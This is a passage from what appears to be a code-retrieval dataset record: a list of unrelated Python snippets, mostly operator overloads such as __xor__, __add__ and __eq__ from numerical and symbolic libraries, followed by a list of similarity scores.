np.dot(Dself, self.comaInv)\n\t\tDCother = np.dot(Dother, other.comaInv)\n\n\t\tCself = np.dot(Dself, DCself)\n\t\tCother = np.dot(Dother, DCother)\n\t\tBself = np.dot(Zself, DCself)\n\t\tBother = np.dot(Zother, DCother)\n\t\tAself = np.dot(Zself, np.transpose(np.dot(Zself, self.comaInv)))\n\t\tAother = np.dot(Zother, np.transpose(np.dot(Zother, other.comaInv)))\n\t\treturn Aself+Aother, 2*(Bself + Bother), Cself + Cother # A factor 2 was missing inB", "def __xor__(self, other):\n\n if isinstance(other, Dyadic):\n return NotImplemented\n if isinstance(other, (int, type(Zero()))):\n if (other == 0):\n return self * 0\n self._check_vector(other)\n\n def _det(mat):\n \"\"\"This is needed as a little method for to find the determinant\n of a list in python; needs to work for a 3x3 list.\n SymPy's Matrix won't take in Vector, so need a custom function.\n You shouldn't be calling this.\n\n \"\"\"\n\n return (mat[0][0] * (mat[1][1] * mat[2][2] - mat[1][2] * mat[2][1])\n + mat[0][1] * (mat[1][2] * mat[2][0] - mat[1][0] *\n mat[2][2]) + mat[0][2] * (mat[1][0] * mat[2][1] -\n mat[1][1] * mat[2][0]))\n\n outvec = Vector([])\n ar = other.args # For brevity\n for i, v in enumerate(ar):\n tempx = 
v[1].x\n tempy = v[1].y\n tempz = v[1].z\n tempm = ([[tempx, tempy, tempz], [self & tempx, self & tempy,\n self & tempz], [Vector([ar[i]]) & tempx,\n Vector([ar[i]]) & tempy, Vector([ar[i]]) & tempz]])\n outvec += _det(tempm)\n return outvec", "def smaller(self):\n return [x for x in TransitiveIdeal(attrcall('pred'), [self])]", "def __eq__(self, other):\n\n equalCoordinates = self.getCoordinate() == other.getCoordinate()\n equalMasses = self.getMass() == other.getMass()\n equalVelocities = self.getVelocity() == other.getVelocity()\n equalAccelerations = self.getAcceleration() == other.getAcceleration()\n\n return equalCoordinates & equalMasses & equalVelocities & equalAccelerations", "def __mul__(self, polynomial_2: Polynomial) -> Polynomial:\n coefficients: list[float] = [0] * (self.degree + polynomial_2.degree + 1)\n for i in range(self.degree + 1):\n for j in range(polynomial_2.degree + 1):\n coefficients[i + j] += (\n self.coefficients[i] * polynomial_2.coefficients[j]\n )\n\n return Polynomial(self.degree + polynomial_2.degree, coefficients)", "def atoms(self):\n return itertools.chain(self.rhs_atoms, self.lhs_atoms)", "def __pow__(self, other):\n if other == 2:\n # cartesian product\n new_set = Set()\n for s1 in self:\n for s2 in self:\n new_set += Set(List([[s1, s2]]))\n return new_set\n raise TypeError(\n f\"{other} must be 2 to compute cartesian product of a set with itself\")", "def __add__(self, other):\n sum_ct = ContingencyTable(*(self.table + other.table).tolist())\n return sum_ct", "def __eq__(self, rhs: Union[float, Simpy]) -> list[bool]:\n mask: list[bool] = []\n if isinstance(rhs, float):\n for item in self.values:\n mask.append(item == rhs)\n else:\n assert len(self.values) == len(rhs.values)\n for i in range(len(self.values)):\n mask.append(self.values[i] == rhs.values[i])\n return mask", "def __add__(self, other: 'ModelParameters') -> 'ModelParameters':\n return ModelParameters([self[idx] + other[idx] for idx in range(len(self))])", "def kspace_cholesky_solve_(self, other):\n n_points = np.max(np.array([n_lattice(self), n_lattice(other)]), axis = 0)\n self_k = transform(self, np.fft.fftn, n_points = n_points)\n other_k = transform(other, np.fft.fftn, n_points = n_points)\n\n ret = tmat()\n ret.load_nparray(np.ones((self_k.coords.shape[0],self_k.blockshape[0], other_k.blockshape[1]), dtype = np.complex), self_k.coords, safemode = False)\n #ret = self_k*1.0\n ret.blocks*=0.0\n\n #ret.blocks[:-1] = np.einsum(\"ijk,ikl->ijl\", self_k.blocks[:-1], other_k.blocks[:-1], optimize = True)\n\n for i in np.arange(len(self_k.blocks)-1):\n \n #print(np.max(np.abs(self_k.blocks[i].T-self_k.blocks[i])))\n #assert(np.max(np.abs(self_k.blocks[i].T-self_k.blocks[i]))<1e-10), \"not symmetric\"\n #assert(np.linalg.norm(self_k.blocks[i].T-self_k.blocks[i])<1e-10), \"not symmetric\"\n Mk = np.linalg.cholesky(self_k.blocks[i])\n yk = np.linalg.solve(Mk, other_k.blocks[i])\n\n\n ret.blocks[i] = np.linalg.solve(Mk.conj().T, yk)\n\n ret = transform(ret, np.fft.ifftn, n_points = n_points, complx = False)\n return ret", "def __xor__(self, other):\n if type(other) == Form:\n other = [other]\n return Form.union([other, self])", "def xor(self, t1, t2):\n return [x ^ y for x, y in zip(t1, t2)]", "def __xor__(self, other: Compound[Scalar]) -> Compound[Scalar]:\n return (self._pack_points(self._points_set ^ other._points_set)\n if isinstance(other, Multipoint)\n else NotImplemented)", "def corr_with(self, other):\n return self.data.corrwith(other)", "def __sub__(self, other):\n return Point([c1 - c2 
for (c1, c2) in zip(self, other)])", "def jaccard_similarity(iterable1, iterable2):\n t = ConfusionMatrix2.from_sets(iterable1, iterable2)\n return t.jaccard_coeff()", "def coefficients(self):\n if self._coefficients is None:\n return np.hstack([c.coefficients for c in self._traces])\n return self._coefficients", "def common_hypernyms(self, other):\n return set(self.all_hypernyms()).intersection(set(other.all_hypernyms()))", "def __xor__(self, other):\n if not isinstance(other, UniSet):\n other = self.fam.c_uniset(other)\n return self.fam.c_xor(self, other)", "def setdiff(self, other):\n\n return self.intersect(other, op=np.setdiff1d)", "def test_coefficients_two_param_circuits(\n self, circuit, degree, expected_coeffs, use_broadcasting\n ):\n coeffs = coefficients(circuit, circuit.n_inputs, degree, use_broadcasting=use_broadcasting)\n assert np.allclose(coeffs, expected_coeffs)", "def get_coeffs(self):\n\n return self._coeff_to_dict()", "def __mod__(self, other):\n return (self - other) + (other - self)", "def getEquates(self, instruction: ghidra.program.model.listing.Instruction, operandIndex: int) -> List[ghidra.program.model.symbol.Equate]:\n ...", "def __add__( self, other ) :\n\n try :\n other = float( other )\n c_ls = self.copy( )\n for l, c_l in enumerate( c_ls ) : c_ls.coefficients[l] += other\n except :\n self.checkSameSeriesType( other )\n c_l1, c_l2 = self, other\n if( len( self ) < len( other ) ) : c_l1, c_l2 = other, self\n c_ls = c_l1.copy( )\n for l, c_l in enumerate( c_l2 ) : c_ls.coefficients[l] += c_l\n return( c_ls )", "def omega(self):\n return [coset for coset in range(len(self.p)) if self.p[coset] == coset]", "def __xor__(self, other):\r\n if self.field.characteristic == 2:\r\n return runtime.xor(self, other)\r\n\r\n return super().__xor__(other)", "def __listsubseteq(self, c1, c2):\n s2 = {}\n for delta in c2:\n s2[delta] = 1\n\n for delta in c1:\n if not s2.has_key(delta):\n return 0\n\n return 1", "def all_coeffs(f):\n return dmp_all_coeffs(f.rep, f.lev, f.dom)", "def __mul__ (self, other):\n return perm(*(self._getcycles() + other._getcycles()))", "def _dot(self, other):\n if self.num_qubits != other.num_qubits:\n raise QiskitError(\"Multiplication on different number of qubits.\")\n result = CNOTDihedral(num_qubits=self.num_qubits)\n result.shift = [\n (x[0] + x[1]) % 2 for x in zip(self._z2matvecmul(self.linear, other.shift), self.shift)\n ]\n result.linear = self._z2matmul(self.linear, other.linear)\n # Compute x' = B1*x + c1 using the p_j identity\n new_vars = []\n for i in range(self.num_qubits):\n support = np.arange(self.num_qubits)[np.nonzero(other.linear[i])]\n poly = SpecialPolynomial(self.num_qubits)\n poly.set_pj(support)\n if other.shift[i] == 1:\n poly = -1 * poly\n poly.weight_0 = (poly.weight_0 + 1) % 8\n new_vars.append(poly)\n # p' = p1 + p2(x')\n result.poly = other.poly + self.poly.evaluate(new_vars)\n return result", "def __xor__(self, other) -> 'MultiVector':\n\n other, mv = self._checkOther(other, coerce=False)\n\n if mv:\n newValue = self.layout.omt_func(self.value, other.value)\n else:\n if isinstance(other, np.ndarray):\n obj = self.__array__()\n return obj^other\n newValue = other*self.value\n\n return self._newMV(newValue)", "def lowest_common_subsumer(self, other):\n lcs = set()\n if other == self:\n lcs.add(self)\n return lcs\n if other in self._direct_hypernyms or other.is_root():\n lcs.add(other)\n return lcs\n if self in other._direct_hypernyms or self.is_root():\n lcs.add(self)\n return lcs\n common_hypernyms = 
self.common_hypernyms(other)\n dist_dict1 = self.get_distances_hypernym_dic()\n dist_dict2 = other.get_distances_hypernym_dic()\n dist = math.inf\n for hypernym in common_hypernyms:\n dist1 = dist_dict1[hypernym]\n dist2 = dist_dict2[hypernym]\n if dist1 + dist2 < dist:\n lcs.clear()\n lcs.add(hypernym)\n dist = dist1 + dist2\n if dist1 + dist2 == dist:\n lcs.add(hypernym)\n return lcs", "def similarity_scores(self, other):\n results = []\n\n words_score=compare_dictionaries(other.words, self.words)\n wordl_score=compare_dictionaries(other.word_lengths, self.word_lengths)\n stems_score=compare_dictionaries(other.stems, self.stems)\n sentl_score=compare_dictionaries(other.sentence_lengths, self.sentence_lengths)\n endings_score=compare_dictionaries(other.endings, self.endings)\n results+= [words_score]\n results+= [wordl_score]\n results+= [stems_score]\n results+= [sentl_score]\n results+= [endings_score]\n return results", "def __sub__(self, other):\n n = len(self)\n\n if n != len(other):\n raise(VetorError, \"Vetor dimensions are not equal\")\n\n v = zeros_como(self)\n\n for i in range(n):\n v[i] = self[i] - other[i]\n\n return v", "def get_covariate_pairs(self):\n if self.covariate_field not in self.matrix.obs.columns:\n raise ValueError(\"Covariate value not available in dataset\")\n from itertools import product\n covariate = set(self.matrix.obs[self.covariate_field])\n return product(covariate, covariate)", "def _compose(self, other):\n if self.num_qubits != other.num_qubits:\n raise QiskitError(\"Multiplication on different number of qubits.\")\n result = CNOTDihedral(num_qubits=self.num_qubits)\n result.shift = [\n (x[0] + x[1]) % 2 for x in zip(self._z2matvecmul(other.linear, self.shift), other.shift)\n ]\n result.linear = self._z2matmul(other.linear, self.linear)\n # Compute x' = B1*x + c1 using the p_j identity\n new_vars = []\n for i in range(self.num_qubits):\n support = np.arange(other.num_qubits)[np.nonzero(self.linear[i])]\n poly = SpecialPolynomial(self.num_qubits)\n poly.set_pj(support)\n if self.shift[i] == 1:\n poly = -1 * poly\n poly.weight_0 = (poly.weight_0 + 1) % 8\n new_vars.append(poly)\n # p' = p1 + p2(x')\n result.poly = self.poly + other.poly.evaluate(new_vars)\n return result", "def mix(self, other: \"DiscreteFactorTable\"):\n if (len(self.support) == 0):\n return other\n if (len(other.support) == 0):\n return self\n\n # NOTE: can this be relaxed?\n assert type(self.support[0]) == type(other.support[0])\n\n jsupport = []\n jlogits = []\n matchedrows = []\n unmatchedrows = []\n\n #check that all entries have same keys\n if isinstance(self.support[0], (dict, frozendict)):\n s_keys = tuple(self.support[0].keys())\n for si in self.support:\n assert tuple(si.keys()) == s_keys\n if isinstance(other.support[0], (dict, frozendict)):\n o_keys = tuple(other.support[0].keys())\n for oi in self.support:\n assert tuple(oi.keys()) == o_keys\n\n #first get inner join rows, tracking ones that don't match\n for si, oi in product(self.support, other.support):\n if isinstance(si, (dict, frozendict)) and isinstance(oi, (dict, frozendict)):\n if dict_match(si, oi): #not efficient if the cartesian product is large\n matchedrows.extend([si, oi])\n soi = dict_merge(si, oi)\n if soi in jsupport:\n continue\n jprob = np.exp(self.logit(si)) + np.exp(other.logit(oi))\n jlogit = np.log(jprob)\n\n if jlogit == -np.inf:\n continue\n jsupport.append(soi)\n jlogits.append(jlogit)\n else:\n unmatchedrows.extend([si, oi])\n else:\n soi = (si, oi)\n jprob = np.exp(self.logit(si)) + 
np.exp(other.logit(oi))\n jlogit = np.log(jprob)\n jsupport.append(soi)\n jlogits.append(jlogit)\n\n #add in the left and right outer join rows, ensuring that they were never matched\n for i in unmatchedrows:\n if (i in matchedrows) or (i in jsupport):\n continue\n logit = np.log(np.exp(self.logit(i)) + np.exp(other.logit(i)))\n if logit == -np.inf:\n continue\n jsupport.append(i)\n jlogits.append(logit)\n return DiscreteFactorTable(support=jsupport, logits=jlogits)", "def __eq__(self, other):\r\n\t\treturn self._to_pylist() == other._to_pylist()", "def difference(self, *other):\n \n new_ordered_set = OrderedSet()\n\n for element in self:\n for obj in other:\n if element in obj:\n break\n else:\n new_ordered_set.add(element)\n\n return new_ordered_set", "def centralizer(self, other):\n if hasattr(other, 'generators'):\n if other.is_trivial or self.is_trivial:\n return self\n degree = self.degree\n identity = _af_new(list(range(degree)))\n orbits = other.orbits()\n num_orbits = len(orbits)\n orbits.sort(key=lambda x: -len(x))\n long_base = []\n orbit_reps = [None]*num_orbits\n orbit_reps_indices = [None]*num_orbits\n orbit_descr = [None]*degree\n for i in range(num_orbits):\n orbit = list(orbits[i])\n orbit_reps[i] = orbit[0]\n orbit_reps_indices[i] = len(long_base)\n for point in orbit:\n orbit_descr[point] = i\n long_base = long_base + orbit\n base, strong_gens = self.schreier_sims_incremental(base=long_base)\n strong_gens_distr = _distribute_gens_by_base(base, strong_gens)\n i = 0\n for i in range(len(base)):\n if strong_gens_distr[i] == [identity]:\n break\n base = base[:i]\n base_len = i\n for j in range(num_orbits):\n if base[base_len - 1] in orbits[j]:\n break\n rel_orbits = orbits[: j + 1]\n num_rel_orbits = len(rel_orbits)\n transversals = [None]*num_rel_orbits\n for j in range(num_rel_orbits):\n rep = orbit_reps[j]\n transversals[j] = dict(\n other.orbit_transversal(rep, pairs=True))\n trivial_test = lambda x: True\n tests = [None]*base_len\n for l in range(base_len):\n if base[l] in orbit_reps:\n tests[l] = trivial_test\n else:\n def test(computed_words, l=l):\n g = computed_words[l]\n rep_orb_index = orbit_descr[base[l]]\n rep = orbit_reps[rep_orb_index]\n im = g._array_form[base[l]]\n im_rep = g._array_form[rep]\n tr_el = transversals[rep_orb_index][base[l]]\n # using the definition of transversal,\n # base[l]^g = rep^(tr_el*g);\n # if g belongs to the centralizer, then\n # base[l]^g = (rep^g)^tr_el\n return im == tr_el._array_form[im_rep]\n tests[l] = test\n\n def prop(g):\n return [rmul(g, gen) for gen in other.generators] == \\\n [rmul(gen, g) for gen in other.generators]\n return self.subgroup_search(prop, base=base,\n strong_gens=strong_gens, tests=tests)\n elif hasattr(other, '__getitem__'):\n gens = list(other)\n return self.centralizer(PermutationGroup(gens))\n elif hasattr(other, 'array_form'):\n return self.centralizer(PermutationGroup([other]))", "def __eq__(self, polynomial_2: object) -> bool:\n if not isinstance(polynomial_2, Polynomial):\n return False\n\n if self.degree != polynomial_2.degree:\n return False\n\n for i in range(self.degree + 1):\n if self.coefficients[i] != polynomial_2.coefficients[i]:\n return False\n\n return True", "def __iadd__(self, other):\n self.components = [c1 + c2 for (c1, c2) in zip(self, other)]\n return self", "def test_coefficients(self):\n\n coefs = self.cs.coefficients\n\n self.assertEqual(coefs, (1, 0, 1, 0, 0, -1))", "def __add__(self, other):\n if (len(self.arg) < len(other.arg)):\n summ = Polynomial(other.arg)\n i = 
len(self.arg) - 1\n for x in self.arg:\n summ.arg[i] = self.arg[i] + summ.arg[i]\n i = i - 1\n else:\n summ = Polynomial(self.arg)\n i = len(other.arg) - 1\n for x in other.arg:\n summ.arg[i] = other.arg[i] + summ.arg[i]\n i = i - 1\n return summ", "def dot(self, other: 'ModelParameters') -> float:\n param_products = []\n for idx in range(len(self.parameters)):\n param_products.append((self.parameters[idx] * other.parameters[idx]).sum().item())\n return sum(param_products)", "def only_diff_elements(s1, s2):\n\n return set(s1 ^ s2)", "def adjoint(self):\n return self.cofactorMatrix().transpose()", "def symmetric_difference(self, other):\n return SymmetricDifference(self, other)", "def __eq__(self, other):\n return LimitedGoniometer.__eq__(self,other) and \\\n (np.deg2rad(self.chi) == other.chi) and \\\n (np.deg2rad(self.omega) == other.omega)", "def __eq__(self, other):\n return (self.real+(self.imag*1j)) == (other.real+(other.imag*1j))\n #return (Complex(self.real, self.imag) == Complex(other.real, other.imag))", "def __cross(self,A, B):\n return [s+t for s in A for t in B]", "def intersection(self, other):\n new_ieqs = []\n new_ieqs.extend(self.inequalities())\n new_ieqs.extend(other.inequalities())\n\n new_eqns = []\n new_eqns.extend(self.equations())\n new_eqns.extend(other.equations())\n\n return Polyhedron(ieqs = new_ieqs, eqns = new_eqns, \n field=self.coerce_field(other))", "def combinations(self):\n return self._combinations", "def _get_params(self):\r\n return np.hstack((self.k1._get_params(), self.k2._get_params()))", "def _get_params(self):\r\n return np.hstack((self.k1._get_params(), self.k2._get_params()))", "def __eq__(self, other):\n if not isinstance(other, OneOfSolidNumericsSolver):\n return False\n\n return self.to_dict() == other.to_dict()", "def __eq__(self, other):\n return (self.vertices == other.vertices and self.weight == other.weight)", "def __and__(self, other):\n points = self.crossForm(other)\n points += [point for point in self.points if point in other]\n points += [point for point in other.points if point in self]\n if points: return Form(points)", "def __eq__(self, other):\n return np.allclose(self.P, other.P)", "def All(self):\n return Constrains._constrains.copy()", "def __eq__(self, other):\n\n if hasattr(other, 'vector'):\n return self.vector == other.vector", "def get_base_coefs(mv):\n\trs = []\n\tfor bs in bases:\n\t\tt = []\n\t\tfor b in bs:\n\t\t\tt.append(mv.coef(b))\n\t\t\t\t\t\n\t\trs.append(t)\t\t\n\treturn rs", "def union(self, other):\n return PermClass([S_1 + S_2 for S_1, S_2 in zip(self, other)])", "def equivalencies(self):\n if hasattr(self, '_equivalencies'):\n return self._equivalencies\n else:\n return self._default_equivalencies" ]
[ "0.66310555", "0.6198817", "0.61889756", "0.5865301", "0.5818835", "0.5683608", "0.5683608", "0.56740135", "0.5648324", "0.56273437", "0.56273437", "0.5593266", "0.55242145", "0.5514569", "0.546532", "0.5455155", "0.5414487", "0.5409538", "0.5363544", "0.53480685", "0.5334692", "0.53232247", "0.53002703", "0.5292918", "0.52882516", "0.52718186", "0.5233594", "0.5221504", "0.5219258", "0.5215172", "0.51632375", "0.515847", "0.5152764", "0.51506984", "0.5141174", "0.5139557", "0.5118783", "0.51012415", "0.50980574", "0.5096633", "0.5063115", "0.5062866", "0.50571597", "0.5043687", "0.5042229", "0.5040098", "0.50396025", "0.5026579", "0.501017", "0.50096226", "0.50094974", "0.5008803", "0.4993444", "0.4991799", "0.49832505", "0.49819326", "0.49696428", "0.49661624", "0.49544895", "0.49509567", "0.49439642", "0.49437022", "0.4937551", "0.49374145", "0.49257195", "0.49219087", "0.4918385", "0.49071503", "0.4906507", "0.49015427", "0.48845962", "0.48816976", "0.4880299", "0.4878021", "0.487765", "0.4876724", "0.48762232", "0.48742834", "0.4869939", "0.48668262", "0.48641574", "0.48594037", "0.48576808", "0.4856895", "0.48525363", "0.48458672", "0.4843521", "0.48420364", "0.48408514", "0.48391318", "0.48391318", "0.48374033", "0.4830426", "0.48208165", "0.4820636", "0.48106027", "0.4808377", "0.4800521", "0.47976816", "0.47932193" ]
0.78071773
0
r""" String when the object is printed
def _repr_(self):
    return 'A {}x{} symbolic max plus matrix on {} variables'.format(
        self.dim(), self.dim(), self.num_vars())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __str__(self):\n return self.printable()", "def __str__(self):\r\n return repr(self)", "def __str__(self):\n return repr(self)", "def __str__(self):\n return \"<%s: %s>\" % (self.__class__, self.describe())", "def __str__(self):\n return_string = self.name + \"\\n\" + str(self.traits)\n\n return return_string", "def __str__(self):\n # print(self.get_string())\n return self.get_string()", "def __str__(self):\n # print(self.get_string())\n return self.get_string()", "def _printable(self):\n pass", "def __str__(self) -> str:", "def __str__(self) -> str:", "def __str__(self) -> str:", "def __str__(self) -> str:", "def __str__(self):\n return self.__class__.__name__ + '\\n' + self.__class__.__doc__", "def __str__(self):\n debug_str = \"%s ::=\" % str(self.head)\n for symbol in self.body:\n debug_str += \" %s\" % str(symbol)\n return debug_str", "def __str__(self): # pragma: no cover\n return self.display()", "def __repr__(self) -> str:\n\t\treturn \"- {}\\n{}\\n\".format(self.name, self.__str__())", "def __repr__(self) -> str:\n\t\treturn \"\"", "def __str__(self):\r\n to_print = (\"Name: \" + self.name + \", Age: \" +\r\n str(self.age) + \", Hobbys: \" + str(self.hobbys))\r\n return to_print", "def __repr__(self) -> str:\n return '{:s}({!r})'.format(self.__class__.__name__, self.getvalue())", "def __repr__(self) -> str:\n return '{:s}({!r})'.format(self.__class__.__name__, self.getvalue())", "def __repr__(self) -> str:\n return '{:s}({!r})'.format(self.__class__.__name__, self.getvalue())", "def __repr__(self):\n str(self)", "def print(self):\n # Your implementation here", "def __str__(self):\n return str(self.__dict__['_obj'])", "def print_me(self):\n return \"ID: %s Title: %s\" % (self.ID, self.title)", "def __str__(self):\r\n return self.__repr__()", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self):\r\n return str(self)", "def display(self):\n print(str(self))", "def __repr__(self):\r\n\t\treturn str(self)", "def __str__(self):\n\n # Print the class and address.\n msg = \"{0} at {1}\\n\".format(str(self.__class__), str(hex(id(self))))\n\n # Print some other basic information.\n msg = \"{0} line name: ({1})\\n\".format(msg, self.name)\n msg = \"{0} ping_time: ({1})\\n\".format(\n msg,\n self.ping_time.shape[0])\n msg = \"{0} data: ({1})\\n\".format(\n msg,\n self.data.shape[0])\n msg = \"{0} start time: {1}\\n\".format(msg,\n self.ping_time[0])\n msg = \"{0} end time: {1}\\n\" .format(msg,\n self.ping_time[-1])\n\n return msg", "def __str__(self):\n print_info = f\"\\nStudent ID: {self._id}, Name: {self._name}, \" \\\n f\"Year: {self._year} \\nPhone: {str(self._phone)}, \" \\\n f\"Address: {str(self._address)} \" \\\n f\"\\nClasses: {str(self._classes)}\" \\\n f\"\\nBirth Date: {self._date}\"\n return print_info", "def __str__(self):\n str = \"[{}] ({}) {}\"\n return (str.format(self.__class__.__name__, self.id, self.__dict__))", "def _print_custom(self):\n pass", "def __str__(self):\n return \"{}\".format(super().__str__())", "def __str__(self):\n string = super().__str__()\n string += \"\\n\" + str(self.get_dict())\n return string", "def toString(self, indent=\"\"):\n return indent + self.__class__.__name__ + \": { }\"", "def __str__(self):\n if self.__description:\n return self.__description\n return repr(self)", "def __str__(self):\n return self.format()", "def __str__(self):\n return str(self.__s)", "def __str__(self) -> 
str:\n\t\treturn \"{}{}; {}\".format(TAB, self.get_typestring(force_regen=True), self.get_description())", "def __repr__(self):\n\t\treturn str(self)", "def __repr__(self):\n\t\treturn str(self)", "def __pout__(self):\n return self.__str__()", "def __str__(self):\n\n return '__str__ for Object'", "def toString():", "def __repr__(self):\r\n return self.__str__()", "def __str__(self):\n print_string = 'key: {} | value: {}'.format(\n str(self.key), str(self.value)\n )\n return print_string", "def debug_string(self):\n\n raise NotImplementedError", "def __str__(self):\r\n return Assert(self.obj.__str__())", "def __str__(self):\n return str(self.obj)", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __repr__(self) -> str:\n return self.__str__()", "def __repr__(self) -> str:\n return self.__str__()", "def __repr__(self) -> str:\n return self.__str__()", "def __repr__(self) -> str:\n return self.__str__()", "def repr_(object_):\n return repr(object_)", "def __str__(self):\n to_print = '{} : {}\\n'.format('Name'.ljust(34),self.name)\n to_print = to_print + '{} : {}\\n'.format('Name'.ljust(34),self.pathloss.name)\n to_print = to_print + '{} : {}\\n'.format('Number of samples'.ljust(34),self.nsamples)\n to_print = to_print + '{} : {}\\n'.format('Sensor model'.ljust(34),self.sensor_model.name)\n to_print = to_print + '{} : {}\\n'.format('Motion model'.ljust(34),self.motion_model.name)\n return to_print", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __str__(self):\n\n\t\toutput = MyUtilities.common.Container.__str__(self)\n\t\tif (self.thing is not None):\n\t\t\toutput += f\"-- Title: {self.title}\\n\"\n\t\treturn output", "def __str__(self):\n return f\"<{full_class_name(self)} {self.name!r} @{'%x' % id(self)}>\"", "def display(self):\n print(self)", "def __str__(self):\n return '{}({})'.format(type(self).__name__, self.__name)", "def __str__(self):\n return str(self.__dict__)", "def __str__(self):\n return str(self.__dict__)", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()" ]
[ "0.8097469", "0.78782415", "0.77841264", "0.7769064", "0.7669302", "0.76466906", "0.76466906", "0.7623327", "0.75980204", "0.75980204", "0.75980204", "0.75980204", "0.7578883", "0.7571893", "0.75686365", "0.75658494", "0.7563032", "0.7543171", "0.7536491", "0.7536491", "0.7536491", "0.75335777", "0.7533551", "0.75238943", "0.7519295", "0.75015163", "0.74921685", "0.74921685", "0.74921685", "0.74921685", "0.74921685", "0.7491741", "0.74778247", "0.74673915", "0.74646866", "0.746028", "0.7448336", "0.74404454", "0.7432172", "0.74287134", "0.74286175", "0.7415816", "0.7414046", "0.74117905", "0.7407612", "0.740644", "0.740644", "0.74050784", "0.73949355", "0.73907", "0.73903054", "0.7385912", "0.73768544", "0.737641", "0.737323", "0.7372543", "0.7372543", "0.7372543", "0.7372543", "0.7372543", "0.7372", "0.7372", "0.7372", "0.7372", "0.7357865", "0.7352673", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.7347109", "0.73441124", "0.73388463", "0.73385465", "0.7324787", "0.7324787", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329" ]
0.0
-1
r""" Evaluates this symbolic matrix at the integer point ``p``.
def eval(self, p):
    from max_plus.max_plus_int import minus_infinity, IntegerMaxPlusMatrix
    F = FreeModule(ZZ, self._nvars)
    p = F(p)
    mat = []
    d = self.dim()
    for i in range(d):
        row = []
        for j in range(d):
            pts = self[i,j]
            row.append(minus_infinity() if not pts else max(p.dot_product(v) for v in pts))
        mat.append(row)
    return IntegerMaxPlusMatrix(self._d, self._d, mat)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate(self,p):\n if not self.initialized: self.__initialize__()\n if self.vp0: p_ = 1-p\n else: p_ = p\n if self.ids_to_consider is None:\n #sum on all parametrized cell\n cf = np.sum(self.V[self.p_ids-1]*p_)/self.V_tot - self.max_v_frac\n else:\n cf = np.sum((self.V[self.ids_to_consider-1]*p_))/self.V_tot - self.max_v_frac\n return cf", "def eval_poly(self, p):\n A = self\n m, n = A.shape\n\n if m != n:\n raise DMNonSquareMatrixError(\"Matrix must be square\")\n\n if not p:\n return self.zeros(self.shape, self.domain)\n elif len(p) == 1:\n return p[0] * self.eye(self.shape, self.domain)\n\n # Evaluate p(A) using Horner's method:\n # XXX: Use Paterson-Stockmeyer method?\n I = A.eye(A.shape, A.domain)\n p_A = p[0] * I\n for pi in p[1:]:\n p_A = A*p_A + pi*I\n\n return p_A", "def matrix_simmetric_representate(self, p):\r\n if (p >0 and (p <= self.dimension()) ):\r\n v = self.basis_group_oriented_p_chains(p)\r\n p = p - 1\r\n ve = self.basis_group_oriented_p_chains(p)\r\n M = csr_matrix((len(ve.dic), len(v.dic)), dtype=np.int8).toarray()\r\n j = 0\r\n for u1 in list(v.dic.keys()):\r\n d = P_chains([u1],[v.dic[u1]])\r\n l = boundary_op_n(d).dic\r\n for u2 in list(l.keys()):\r\n i = 0\r\n for w in list(ve.dic.keys()):\r\n if (w == u2):\r\n M[i,j] = int((l)[u2])\r\n i = i + 1\r\n j = j + 1\r\n return M \r\n else:\r\n if (p == 0):\r\n return np.identity(len(list(self.basis_group_oriented_p_chains(0).dic.keys())))\r\n else:\r\n return False", "def update_p(self, p: float):\n self.p = p\n for k, sequential in self.m_ops.items():\n if sequential[0].is_identity_op():\n sequential[-1].p = p", "def EvaluateLocation(self, p_int, , p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def _eval_coeff(self, pt):\n val = 1\n for a in self.args:\n val *= a.coeff(pt)\n return val", "def regular(P):\n try:\n cols = P.shape[0]\n ans = np.ones((1, cols))\n # eq = np.matmul(ans, P)\n # s = np.array(np.arange(1, cols + 1))\n eq = np.vstack([P.T - np.identity(cols), ans])\n # va, vec = np.linalg .eig(P)\n results = np.zeros((cols, 1))\n results = np.vstack([results, np.array([1])])\n statetionary = np.linalg.solve(eq.T.dot(eq), eq.T.dot(results)).T\n # print(statetionary)\n # print(np.argwhere(statetionary < 0))\n if len(np.argwhere(statetionary < 0)) > 0:\n return None\n return statetionary\n except Exception as e:\n return None", "def evalComponent(self, x, p):\n if p > 0 and p <= self.n:\n p = str(p)\n y = self[\"off\"] + self[\"lin\"] * x\n self._v1d.assignValues(\n {\"A\": self[\"A\" + p], \"al\": self[\"al\" + p], \"ad\": self[\"ad\" + p], \"mu\": self[\"mu\" + p]})\n y += self._v1d.evaluate(x)\n return y\n else:\n raise(PE.PyAValError(\"No such component (no. 
